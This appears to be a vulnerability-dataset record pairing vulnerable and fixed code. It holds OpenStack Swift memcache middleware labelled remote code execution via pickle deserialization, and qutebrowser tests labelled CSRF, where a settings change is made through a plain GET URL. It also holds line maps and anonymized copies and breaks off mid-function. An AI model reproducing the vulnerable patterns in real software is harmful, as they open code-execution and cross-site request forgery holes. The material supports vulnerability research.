| # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class MemcacheMiddleware(object):
"""
Caching middleware that manages caching in swift.
"""
def __init__(self, app, conf):
self.app = app
self.memcache_servers = conf.get('memcache_servers')
serialization_format = conf.get('memcache_serialization_support')
if not self.memcache_servers or serialization_format is None:
path = os.path.join(conf.get('swift_dir', '/etc/swift'),
'memcache.conf')
memcache_conf = ConfigParser()
if memcache_conf.read(path):
if not self.memcache_servers:
try:
self.memcache_servers = \
memcache_conf.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if serialization_format is None:
try:
serialization_format = \
memcache_conf.get('memcache',
'memcache_serialization_support')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
if serialization_format is None:
serialization_format = 2
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()],
allow_pickle=(serialization_format == 0),
allow_unpickle=(serialization_format <= 1))
def __call__(self, env, start_response):
env['swift.cache'] = self.memcache
return self.app(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def cache_filter(app):
return MemcacheMiddleware(app, conf)
return cache_filter
| remote_code_execution | {
"code": [
" if not self.memcache_servers:",
" try:",
" self.memcache_servers = \\",
" memcache_conf.get('memcache', 'memcache_servers')",
" except (NoSectionError, NoOptionError):",
" pass",
" [s.strip() for s in self.memcache_servers.split(',') if s.strip()])"
],
"line_no": [
30,
35,
36,
37,
38,
39,
43
]
} | {
"code": [
" serialization_format = conf.get('memcache_serialization_support')",
" if not self.memcache_servers or serialization_format is None:",
" if not self.memcache_servers:",
" try:",
" self.memcache_servers = \\",
" memcache_conf.get('memcache', 'memcache_servers')",
" except (NoSectionError, NoOptionError):",
" pass",
" if serialization_format is None:",
" serialization_format = \\",
" memcache_conf.get('memcache',",
" 'memcache_serialization_support')",
" pass",
" serialization_format = 2",
" [s.strip() for s in self.memcache_servers.split(',') if s.strip()],",
" allow_unpickle=(serialization_format <= 1))"
],
"line_no": [
30,
32,
37,
38,
39,
40,
41,
42,
43,
45,
46,
47,
49,
54,
57,
59
]
} |
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class CLASS_0(object):
def __init__(self, VAR_2, VAR_3):
self.app = VAR_2
self.memcache_servers = VAR_3.get('memcache_servers')
if not self.memcache_servers:
VAR_6 = os.path.join(VAR_3.get('swift_dir', '/etc/swift'),
'memcache.conf')
VAR_7 = ConfigParser()
if VAR_7.read(VAR_6):
try:
self.memcache_servers = \
VAR_7.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()])
def __call__(self, VAR_4, VAR_5):
VAR_4['swift.cache'] = self.memcache
return self.app(VAR_4, VAR_5)
def FUNC_0(VAR_0, **VAR_1):
VAR_3 = VAR_0.copy()
VAR_3.update(VAR_1)
def FUNC_1(VAR_2):
return CLASS_0(VAR_2, VAR_3)
return FUNC_1
|
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class CLASS_0(object):
def __init__(self, VAR_2, VAR_3):
self.app = VAR_2
self.memcache_servers = VAR_3.get('memcache_servers')
VAR_6 = VAR_3.get('memcache_serialization_support')
if not self.memcache_servers or VAR_6 is None:
VAR_7 = os.path.join(VAR_3.get('swift_dir', '/etc/swift'),
'memcache.conf')
VAR_8 = ConfigParser()
if VAR_8.read(VAR_7):
if not self.memcache_servers:
try:
self.memcache_servers = \
VAR_8.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if VAR_6 is None:
try:
VAR_6 = \
VAR_8.get('memcache',
'memcache_serialization_support')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
if VAR_6 is None:
VAR_6 = 2
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()],
allow_pickle=(VAR_6 == 0),
allow_unpickle=(VAR_6 <= 1))
def __call__(self, VAR_4, VAR_5):
VAR_4['swift.cache'] = self.memcache
return self.app(VAR_4, VAR_5)
def FUNC_0(VAR_0, **VAR_1):
VAR_3 = VAR_0.copy()
VAR_3.update(VAR_1)
def FUNC_1(VAR_2):
return CLASS_0(VAR_2, VAR_3)
return FUNC_1
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
21,
26,
44,
48,
49,
53,
56,
58,
23,
24,
25
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
21,
26,
31,
50,
55,
60,
64,
65,
69,
72,
74,
23,
24,
25
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Test starting qutebrowser with special arguments/environments."""
import subprocess
import socket
import sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
ascii_locale = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def _base_args(config):
"""Get the arguments to pass with every invocation."""
args = ['--debug', '--json-logging', '--no-err-windows']
if config.webengine:
args += ['--backend', 'webengine']
else:
args += ['--backend', 'webkit']
if qVersion() == '5.7.1':
# https://github.com/qutebrowser/qutebrowser/issues/3163
args += ['--qt-flag', 'disable-seccomp-filter-sandbox']
args.append('about:blank')
return args
@pytest.fixture
def temp_basedir_env(tmpdir, short_tmpdir):
"""Return a dict of environment variables that fakes --temp-basedir.
We can't run --basedir or --temp-basedir for some tests, so we mess with
XDG_*_DIR to get things relocated.
"""
data_dir = tmpdir / 'data'
config_dir = tmpdir / 'config'
runtime_dir = short_tmpdir / 'rt'
cache_dir = tmpdir / 'cache'
runtime_dir.ensure(dir=True)
runtime_dir.chmod(0o700)
(data_dir / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
env = {
'XDG_DATA_HOME': str(data_dir),
'XDG_CONFIG_HOME': str(config_dir),
'XDG_RUNTIME_DIR': str(runtime_dir),
'XDG_CACHE_HOME': str(cache_dir),
}
return env
@pytest.mark.linux
@ascii_locale
def test_downloads_with_ascii_locale(request, server, tmpdir, quteproc_new):
"""Test downloads with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/908
https://github.com/qutebrowser/qutebrowser/issues/1726
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('downloads.location.directory', str(tmpdir))
# Test a normal download
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/ä-issue908.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
# Test :prompt-open-download
quteproc_new.set_setting('downloads.location.prompt', 'true')
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
quteproc_new.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
quteproc_new.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(tmpdir.listdir()) == 1
assert (tmpdir / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@ascii_locale
def test_open_with_ascii_locale(request, server, tmpdir, quteproc_new, url):
"""Test opening non-ascii URL with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('url.auto_search', 'never')
# Test opening a file whose name contains non-ascii characters.
# No exception thrown means test success.
quteproc_new.send_cmd(':open {}'.format(url))
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@ascii_locale
def test_open_command_line_with_ascii_locale(request, server, tmpdir,
quteproc_new):
"""Test opening file via command line with a non-ascii name with LC_ALL=C.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
# The file does not actually have to exist because the relevant checks will
# all be called. No exception thrown means test success.
args = (['--temp-basedir'] + _base_args(request.config) +
['/home/user/föö.html'])
quteproc_new.start(args, env={'LC_ALL': 'C'}, wait_focus=False)
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def test_misconfigured_user_dirs(request, server, temp_basedir_env,
tmpdir, quteproc_new):
"""Test downloads with a misconfigured XDG_DOWNLOAD_DIR.
https://github.com/qutebrowser/qutebrowser/issues/866
https://github.com/qutebrowser/qutebrowser/issues/1269
"""
home = tmpdir / 'home'
home.ensure(dir=True)
temp_basedir_env['HOME'] = str(home)
assert temp_basedir_env['XDG_CONFIG_HOME'] == tmpdir / 'config'
(tmpdir / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
quteproc_new.start(_base_args(request.config), env=temp_basedir_env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/download.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
line = quteproc_new.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
line.expected = True
quteproc_new.wait_for(category='downloads',
message='Download download.bin finished')
assert (home / 'download.bin').exists()
def test_no_loglines(request, quteproc_new):
"""Test qute://log with --loglines=0."""
quteproc_new.start(args=['--temp-basedir', '--loglines=0'] +
_base_args(request.config))
quteproc_new.open_path('qute://log')
assert quteproc_new.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def test_optimize(request, quteproc_new, capfd, level):
quteproc_new.start(args=['--temp-basedir'] + _base_args(request.config),
env={'PYTHONOPTIMIZE': level})
if level == '2':
msg = ("Running on optimize level higher than 1, unexpected behavior "
"may occur.")
line = quteproc_new.wait_for(message=msg)
line.expected = True
# Waiting for quit to make sure no other warning is emitted
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def test_version(request):
"""Test invocation with --version argument."""
args = ['-m', 'qutebrowser', '--version'] + _base_args(request.config)
# can't use quteproc_new here because it's confused by
# early process termination
proc = QProcess()
proc.setProcessChannelMode(QProcess.SeparateChannels)
proc.start(sys.executable, args)
ok = proc.waitForStarted(2000)
assert ok
ok = proc.waitForFinished(10000)
stdout = bytes(proc.readAllStandardOutput()).decode('utf-8')
print(stdout)
stderr = bytes(proc.readAllStandardError()).decode('utf-8')
print(stderr)
assert ok
assert proc.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\s+v\d+(\.\d+)', stdout) is not None
def test_qt_arg(request, quteproc_new, tmpdir):
"""Test --qt-arg."""
args = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(tmpdir / 'does-not-exist')] + _base_args(request.config))
quteproc_new.start(args)
msg = 'QCss::Parser - Failed to load file "*does-not-exist"'
line = quteproc_new.wait_for(message=msg)
line.expected = True
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@utils.skip_qt511
def test_webengine_inspector(request, quteproc_new):
if not request.config.webengine:
pytest.skip()
args = (['--temp-basedir', '--enable-webengine-inspector'] +
_base_args(request.config))
quteproc_new.start(args)
line = quteproc_new.wait_for(
message='Remote debugging server started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
port = int(line.message.split(':')[-1])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
@pytest.mark.linux
def test_webengine_download_suffix(request, quteproc_new, tmpdir):
"""Make sure QtWebEngine does not add a suffix to downloads."""
if not request.config.webengine:
pytest.skip()
download_dir = tmpdir / 'downloads'
download_dir.ensure(dir=True)
(tmpdir / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(download_dir))
env = {'XDG_CONFIG_HOME': str(tmpdir)}
args = (['--temp-basedir'] + _base_args(request.config))
quteproc_new.start(args, env=env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
quteproc_new.set_setting('downloads.location.directory', str(download_dir))
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(category='downloads', message='Download * finished')
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(message='Entering mode KeyMode.yesno *')
quteproc_new.send_cmd(':prompt-accept yes')
quteproc_new.wait_for(category='downloads', message='Download * finished')
files = download_dir.listdir()
assert len(files) == 1
assert files[0].basename == 'download.bin'
def test_command_on_start(request, quteproc_new):
"""Make sure passing a command on start works.
See https://github.com/qutebrowser/qutebrowser/issues/2408
"""
args = (['--temp-basedir'] + _base_args(request.config) +
[':quickmark-add https://www.example.com/ example'])
quteproc_new.start(args)
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_launching_with_python2():
try:
proc = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], stderr=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert proc.returncode == 1
error = "At least Python 3.5 is required to run qutebrowser"
assert proc.stderr.decode('ascii').startswith(error)
def test_initial_private_browsing(request, quteproc_new):
"""Make sure the initial window is private when the setting is set."""
args = (_base_args(request.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- private: True
tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_loading_empty_session(tmpdir, request, quteproc_new):
"""Make sure loading an empty session opens a window."""
session = tmpdir / 'session.yml'
session.write('windows: []')
args = _base_args(request.config) + ['--temp-basedir', '-r', str(session)]
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_qute_settings_persistence(short_tmpdir, request, quteproc_new):
"""Make sure settings from qute://settings are persistent."""
args = _base_args(request.config) + ['--basedir', str(short_tmpdir)]
quteproc_new.start(args)
quteproc_new.open_path(
'qute://settings/set?option=search.ignore_case&value=always')
assert quteproc_new.get_setting('search.ignore_case') == 'always'
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
quteproc_new.start(args)
assert quteproc_new.get_setting('search.ignore_case') == 'always'
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Test starting qutebrowser with special arguments/environments."""
import subprocess
import socket
import sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
ascii_locale = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def _base_args(config):
"""Get the arguments to pass with every invocation."""
args = ['--debug', '--json-logging', '--no-err-windows']
if config.webengine:
args += ['--backend', 'webengine']
else:
args += ['--backend', 'webkit']
if qVersion() == '5.7.1':
# https://github.com/qutebrowser/qutebrowser/issues/3163
args += ['--qt-flag', 'disable-seccomp-filter-sandbox']
args.append('about:blank')
return args
@pytest.fixture
def temp_basedir_env(tmpdir, short_tmpdir):
"""Return a dict of environment variables that fakes --temp-basedir.
We can't run --basedir or --temp-basedir for some tests, so we mess with
XDG_*_DIR to get things relocated.
"""
data_dir = tmpdir / 'data'
config_dir = tmpdir / 'config'
runtime_dir = short_tmpdir / 'rt'
cache_dir = tmpdir / 'cache'
runtime_dir.ensure(dir=True)
runtime_dir.chmod(0o700)
(data_dir / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
env = {
'XDG_DATA_HOME': str(data_dir),
'XDG_CONFIG_HOME': str(config_dir),
'XDG_RUNTIME_DIR': str(runtime_dir),
'XDG_CACHE_HOME': str(cache_dir),
}
return env
@pytest.mark.linux
@ascii_locale
def test_downloads_with_ascii_locale(request, server, tmpdir, quteproc_new):
"""Test downloads with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/908
https://github.com/qutebrowser/qutebrowser/issues/1726
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('downloads.location.directory', str(tmpdir))
# Test a normal download
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/ä-issue908.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
# Test :prompt-open-download
quteproc_new.set_setting('downloads.location.prompt', 'true')
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
quteproc_new.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
quteproc_new.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(tmpdir.listdir()) == 1
assert (tmpdir / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@ascii_locale
def test_open_with_ascii_locale(request, server, tmpdir, quteproc_new, url):
"""Test opening non-ascii URL with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('url.auto_search', 'never')
# Test opening a file whose name contains non-ascii characters.
# No exception thrown means test success.
quteproc_new.send_cmd(':open {}'.format(url))
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@ascii_locale
def test_open_command_line_with_ascii_locale(request, server, tmpdir,
quteproc_new):
"""Test opening file via command line with a non-ascii name with LC_ALL=C.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
# The file does not actually have to exist because the relevant checks will
# all be called. No exception thrown means test success.
args = (['--temp-basedir'] + _base_args(request.config) +
['/home/user/föö.html'])
quteproc_new.start(args, env={'LC_ALL': 'C'}, wait_focus=False)
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def test_misconfigured_user_dirs(request, server, temp_basedir_env,
tmpdir, quteproc_new):
"""Test downloads with a misconfigured XDG_DOWNLOAD_DIR.
https://github.com/qutebrowser/qutebrowser/issues/866
https://github.com/qutebrowser/qutebrowser/issues/1269
"""
home = tmpdir / 'home'
home.ensure(dir=True)
temp_basedir_env['HOME'] = str(home)
assert temp_basedir_env['XDG_CONFIG_HOME'] == tmpdir / 'config'
(tmpdir / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
quteproc_new.start(_base_args(request.config), env=temp_basedir_env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/download.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
line = quteproc_new.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
line.expected = True
quteproc_new.wait_for(category='downloads',
message='Download download.bin finished')
assert (home / 'download.bin').exists()
def test_no_loglines(request, quteproc_new):
"""Test qute://log with --loglines=0."""
quteproc_new.start(args=['--temp-basedir', '--loglines=0'] +
_base_args(request.config))
quteproc_new.open_path('qute://log')
assert quteproc_new.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def test_optimize(request, quteproc_new, capfd, level):
quteproc_new.start(args=['--temp-basedir'] + _base_args(request.config),
env={'PYTHONOPTIMIZE': level})
if level == '2':
msg = ("Running on optimize level higher than 1, unexpected behavior "
"may occur.")
line = quteproc_new.wait_for(message=msg)
line.expected = True
# Waiting for quit to make sure no other warning is emitted
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def test_version(request):
"""Test invocation with --version argument."""
args = ['-m', 'qutebrowser', '--version'] + _base_args(request.config)
# can't use quteproc_new here because it's confused by
# early process termination
proc = QProcess()
proc.setProcessChannelMode(QProcess.SeparateChannels)
proc.start(sys.executable, args)
ok = proc.waitForStarted(2000)
assert ok
ok = proc.waitForFinished(10000)
stdout = bytes(proc.readAllStandardOutput()).decode('utf-8')
print(stdout)
stderr = bytes(proc.readAllStandardError()).decode('utf-8')
print(stderr)
assert ok
assert proc.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\s+v\d+(\.\d+)', stdout) is not None
def test_qt_arg(request, quteproc_new, tmpdir):
"""Test --qt-arg."""
args = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(tmpdir / 'does-not-exist')] + _base_args(request.config))
quteproc_new.start(args)
msg = 'QCss::Parser - Failed to load file "*does-not-exist"'
line = quteproc_new.wait_for(message=msg)
line.expected = True
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@utils.skip_qt511
def test_webengine_inspector(request, quteproc_new):
if not request.config.webengine:
pytest.skip()
args = (['--temp-basedir', '--enable-webengine-inspector'] +
_base_args(request.config))
quteproc_new.start(args)
line = quteproc_new.wait_for(
message='Remote debugging server started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
port = int(line.message.split(':')[-1])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
@pytest.mark.linux
def test_webengine_download_suffix(request, quteproc_new, tmpdir):
"""Make sure QtWebEngine does not add a suffix to downloads."""
if not request.config.webengine:
pytest.skip()
download_dir = tmpdir / 'downloads'
download_dir.ensure(dir=True)
(tmpdir / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(download_dir))
env = {'XDG_CONFIG_HOME': str(tmpdir)}
args = (['--temp-basedir'] + _base_args(request.config))
quteproc_new.start(args, env=env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
quteproc_new.set_setting('downloads.location.directory', str(download_dir))
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(category='downloads', message='Download * finished')
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(message='Entering mode KeyMode.yesno *')
quteproc_new.send_cmd(':prompt-accept yes')
quteproc_new.wait_for(category='downloads', message='Download * finished')
files = download_dir.listdir()
assert len(files) == 1
assert files[0].basename == 'download.bin'
def test_command_on_start(request, quteproc_new):
"""Make sure passing a command on start works.
See https://github.com/qutebrowser/qutebrowser/issues/2408
"""
args = (['--temp-basedir'] + _base_args(request.config) +
[':quickmark-add https://www.example.com/ example'])
quteproc_new.start(args)
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_launching_with_python2():
try:
proc = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], stderr=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert proc.returncode == 1
error = "At least Python 3.5 is required to run qutebrowser"
assert proc.stderr.decode('ascii').startswith(error)
def test_initial_private_browsing(request, quteproc_new):
"""Make sure the initial window is private when the setting is set."""
args = (_base_args(request.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- private: True
tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_loading_empty_session(tmpdir, request, quteproc_new):
"""Make sure loading an empty session opens a window."""
session = tmpdir / 'session.yml'
session.write('windows: []')
args = _base_args(request.config) + ['--temp-basedir', '-r', str(session)]
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_qute_settings_persistence(short_tmpdir, request, quteproc_new):
"""Make sure settings from qute://settings are persistent."""
args = _base_args(request.config) + ['--basedir', str(short_tmpdir)]
quteproc_new.start(args)
quteproc_new.open_path('qute://settings/')
quteproc_new.send_cmd(':jseval --world main '
'cset("search.ignore_case", "always")')
assert quteproc_new.get_setting('search.ignore_case') == 'always'
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
quteproc_new.start(args)
assert quteproc_new.get_setting('search.ignore_case') == 'always'
| xsrf | {
"code": [
" quteproc_new.open_path(",
" 'qute://settings/set?option=search.ignore_case&value=always')"
],
"line_no": [
371,
372
]
} | {
"code": [
" quteproc_new.open_path('qute://settings/')",
" quteproc_new.send_cmd(':jseval --world main '",
" 'cset(\"search.ignore_case\", \"always\")')"
],
"line_no": [
371,
372,
373
]
} |
import .subprocess
import .socket
import .sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
VAR_0 = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def FUNC_0(VAR_1):
VAR_11 = ['--debug', '--json-logging', '--no-err-windows']
if VAR_1.webengine:
VAR_11 += ['--backend', 'webengine']
else:
VAR_11 += ['--backend', 'webkit']
if qVersion() == '5.7.1':
VAR_11 += ['--qt-flag', 'disable-seccomp-filter-sandbox']
VAR_11.append('about:blank')
return VAR_11
@pytest.fixture
def VAR_8(VAR_2, VAR_3):
VAR_12 = VAR_2 / 'data'
VAR_13 = VAR_2 / 'config'
VAR_14 = VAR_3 / 'rt'
VAR_15 = VAR_2 / 'cache'
VAR_14.ensure(dir=True)
VAR_14.chmod(0o700)
(VAR_12 / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
VAR_16 = {
'XDG_DATA_HOME': str(VAR_12),
'XDG_CONFIG_HOME': str(VAR_13),
'XDG_RUNTIME_DIR': str(VAR_14),
'XDG_CACHE_HOME': str(VAR_15),
}
return VAR_16
@pytest.mark.linux
@VAR_0
def FUNC_2(VAR_4, VAR_5, VAR_2, VAR_6):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('downloads.location.directory', str(VAR_2))
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/ä-issue908.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
VAR_6.set_setting('downloads.location.prompt', 'true')
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
VAR_6.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
VAR_6.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(VAR_2.listdir()) == 1
assert (VAR_2 / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@VAR_0
def FUNC_3(VAR_4, VAR_5, VAR_2, VAR_6, VAR_7):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('url.auto_search', 'never')
